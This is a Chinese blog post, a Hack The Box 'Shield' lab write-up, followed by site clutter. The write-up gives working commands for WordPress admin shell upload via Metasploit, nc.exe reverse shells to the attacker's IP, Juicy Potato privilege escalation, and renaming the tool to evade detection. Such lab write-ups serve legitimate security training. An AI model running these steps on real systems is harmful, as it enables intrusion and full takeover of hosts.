Hack the box shield

最新推荐文章于 2024-08-09 09:21:14 发布
最新推荐文章于 2024-08-09 09:21:14 发布
阅读量110 收藏
点赞数
分类专栏: Hack the box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/118465564
版权

这一台靶机需要用到上一台靶机的地方是上一台靶机数据库用户的密码
1.日常操作,NMAP扫ip nmap -sC -sV 10.10.10.29就扫出来一个80端口
2.浏览器页面源码审计,看到了wordpress wp-contents之类的路径,那么wordpress是八九不离十了,为了确认以下还可以扫一下路径,gobuster和dirsearch二选一
gobuster dir -u http://10.10.10.29 -w /usr/share/wordlists/dirb/common.txt
dirsearch -u http://10.10.10.29/
扫出/wordpress,尝试wp-login.php果然是默认路径没有改
admin:P@s5w0rd!(从上一台靶机得来)
登陆成功
3.到这有两个思路:后台改php,直接传小马,wordpress有一个比较危险的地方是主题可以直接编辑,点apperance下面的theme editor,
右侧可以直接更改php文件内容,这种可以直接上传shell,常规思路nc反弹马即可
或者msf大法,msfconsole
search wp_admin //所得到的那个模块是有账号密码的情况下直接得shell的
————————————————————————————————
use exploit/unix/webapp/wp_admin_shell_upload
set PASSWORD P@s5w0rd!
set USERNAME admin
set TARGETURI /wordpress
set RHOSTS 10.10.10.29
run
——————————————————————————————————
得到msf的shell,这里有个问题,就是msf的shell不稳定,过几分钟就会断,可能是靶机那设置了,所以需要把shell弹回本地
kali是带了能在windows上执行的nc的,路径在/usr/share/windows-resources/binaries/nc.exe
用find指令找也行 find / -name “nc.exe”
wordpress上传目录在wp_contents目录下的uploads文件夹,cd …/…/uploads
upload /usr/share/windows-resources/binaries/nc.exe
其实其他路径目测也能传,不知道为什么一定要传到这,可能有防护机制,过几分钟就把其他路径的文件删了
4.execute -f nc.exe -a “-e cmd.exe 10.10.14.50 7777” //10.10.14.50是你自己的IP,反弹shell到本地 -f执行nc -a 传参 -e 由nc去调用cmd
nc -lvvp 7777接收反弹回来的shell
5.这题没有用户flag,直接提权,sysinfo windows server 2016,考虑土豆提权,关于这个东西的原理,可以看这篇文章
https://www.freebuf.com/column/181549.html
https://blog.csdn.net/qq_26091745/article/details/105091686
反正我也没去深究,大概就是利用了NTLM验证的一个漏洞
下载地址:https://github.com/ohpe/juicy-potato,别git,git下来的要自己编译,直接点进Free potato里面下载Juicy potato
文章里也说了,已经对Juicy potato进行检测了,所以需要换名,
mv Juicy potato.exe js.exe
6.upload js.exe用于提权
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe-epowershell.exe 10.10.14.50 1111>shell.bat//用于后面提权
kali:nc -lvvp 1111//接收反弹shell
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
//-t *:创建使用TokenW和User两种模式的进程
//-p:指定要运行的程序(无法传递带参数的命令,所以要提前用bat写好)
//-l:COM服务监听的端口
1337端口有可能不成功,可以-c {bb6df56b-cace-11dc-9992-0019b93a3a84}做替补
拿到root权限的shell
参考视频链接:https://www.bilibili.com/video/BV19y4y1M7gS/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
渗透测试练习靶场hackthebox——Starting Point Shield攻略
TF0xn的博客
09-26 1143
目录扫描爆破web目录获取webshell提权获取flag后续完结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -T4 -F -sV 10.10.10.28 -T4:针对TCP端口禁止动态扫描延迟超过10ms -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 先去80端口看一下,发现是一个IIS的默认页面 爆破web目录 在github中下载dirsearch工具来爆破web路径,进入工具的路径下,执行 python3 dirsearch.py -u 10.
hack the box sheild 靶场练习
鸥鹭忘机
08-02 933
收集信息 首先用nmap对目标主机进行扫描。 nmap -sV -sS -F 10.10.10.29 -sV 代表扫描端口和开放的服务信息 -sS 代表用TCP半开式扫描 -F 快速扫描,扫描常用的端口 我们发现了这台主机开放了80端口和3306端口,并且这是一台windows系统的服务器。我们首先访问一下这个网站。在这网站什么也没有发现,按F12查看源代码也没有发现有利用价值的URL,点击图片后就跳转到了微软公司的官方网站。 我们尝试用目录扫描器扫描一下这个网站。打开dirbuster,在Tar
0x03-HackTheBox-Shield
0pr
04-22 531
Shield Video Walkthrough!???? 个人博客地址 Via今天回来继续 HackTheBox 系列。有事耽误了两天。前两天发现 Vaccine 这个机器老是会出现网络问题,我就跳过不做了。那么今天就是 Shield。 目标机器在IP地址 10.10.10.29。 Recon Nmap 只有 80 和 3306 端口开着,一个网站,加一个 mysql server。 攻击者可以继...
Hack The Box : Starting Point - Shield
qq_60201815的博客
09-29 155
环境准备 攻击机:kali-linux 靶机:Oopsie --------------------------------------------------------------------------------------------------------------------------------- 网络配置:操作与Archetype靶机相同,链接:Hack The Box : Starting Point - Archetype_丶 Chave的博客-CSDN博客 渗透过程
hackbox
5L2g556F5ZWl77yf
05-15 1343
Archetype 得到一个SSIS(SQL Server Integration Services )配置文件,和账户密码 百度前辈解题步骤,SQLServer 身份验证方式为 操作系统身份验证 https://docs.microsoft.com/en-us/sql/integration-services/lesson-1-4-adding-package-configurations?view=sql-server-2017 通msf连接 开启xp_cmdshell exec sp_confi
Revenge of the Nerds
creambean的博客
04-13 769
文章目录Catching Up with MathWhat Made Lisp DifferentWhere Languages MatterCentripetal ForcesThe Cost of Being AverageA RecipeAppendix: PowerNotes (转)Revenge of the Nerds May 2002 "We were after the C++ p...
Shield 02_shield_
09-30
标题 "Shield 02_shield_" 暗示我们正在讨论的是一个与游戏相关的3D模型,具体来说是一个盾牌的模型。这个模型是专为muonline设计的,muonline是一款流行的多人在线角色扮演游戏(MMORPG)。在游戏开发中,3D模型...
Shield 03_Shield03_
09-28
标题中的"Shield 03_Shield03_"可能是指一个针对muonline(一款多人在线角色扮演游戏)的3D模型对象,具体来说是一个盾牌。在游戏设计和开发中,3D模型是创建虚拟环境和角色的重要元素,它们为玩家提供视觉体验。...
Shield 04_Shield04_
09-29
标题中的"Shield 04_Shield04_"很可能是指一个基于MuOnline游戏的3D模型项目,其中"Shield"通常代表“盾牌”,而"04"可能是版本号或者序列号,表明这是系列中的第四个盾牌模型。描述中的"Shield para muonline em ...
Shield 01_Shield01_
10-01
标题中的"Shield 01_Shield01_"可能是指一个针对muonline(一款流行的多人在线角色扮演游戏)的3D模型对象,特别是一款盾牌。在游戏设计和开发中,3D模型是创建游戏角色、道具和环境的基本元素。"Shield01"标签...
hackeeg-shield-1-master_hack_EEG_ADS1299_
09-29
标题中的“hackeeg-shield-1-master_hack_EEG_ADS1299_”表明这是一个关于EEG(脑电图) shield 的项目,基于TI公司的ADS1299芯片,且处于开发的master分支。这个项目可能是为了黑客马拉松或者爱好者社区设计,允许...
域名安全详解
TechEnthusiast的博客
08-06 155
域名安全是网络安全的重要组成部分,涉及多个方面。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 852
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
08-09 473
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
某赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SQL注入漏洞复现(XVE-2024-19611)
0xSec
08-08 590
某赛通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
数据跨境传输的安全合规风险如何规避?获取免费解决方案白皮书
文件数据安全交换
08-07 291
在全球化的背景下,企业进行有 效的资源整合,学习海外市场的先进技术和管理经验,寻找新的增长点,实现业务的多元化和 可持续发展,不仅有利于开辟新市场,更有助于巩固和增强企业在全球中的地位。应用风险:跨境数据的承载介质多样、呈现形态各异、应用广泛,数据所在国的政策和法律存 在差异,这可能导致数据所有和使用者权限模糊,数据应用开发存在被滥用的风险。自然灾害(如火灾、水灾、地震等)和事故(如电力故障、设备故障等)可能导致数据的物理 损失,使数据的完整性和可用性遭到破坏,数据失去使用价值。2、数据攻击窃取风险。
Linux系统下的容器安全:原理、风险与防范措施
ddcajdkdl的博客
08-07 393
Linux命名空间为容器提供了独立的视图,包括PID、网络、UTS、IPC和mount命名空间,确保容器内的进程、网络配置、主机名、Inter-Process Communication和文件系统与宿主机隔离。Linux系统下的容器安全是一个至关重要的议题,涉及到容器的隔离性、网络访问控制、镜像安全、以及运行时保护等多个方面。通过cgroups,可以限制、记录和隔离容器使用的物理资源,如CPU、内存、I/O等,防止容器资源滥用影响宿主机或其它容器的稳定性。
shield the Schottky contact是什么意思
07-25
"Shield the Schottky contact" 的意思是在器件中采取措施来保护或屏蔽肖特基接触。 肖特基接触是一种由金属与半导体之间形成的非欧姆接触,常用于各种电子器件中,如二极管、场效应晶体管等。然而,由于肖特基接触...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值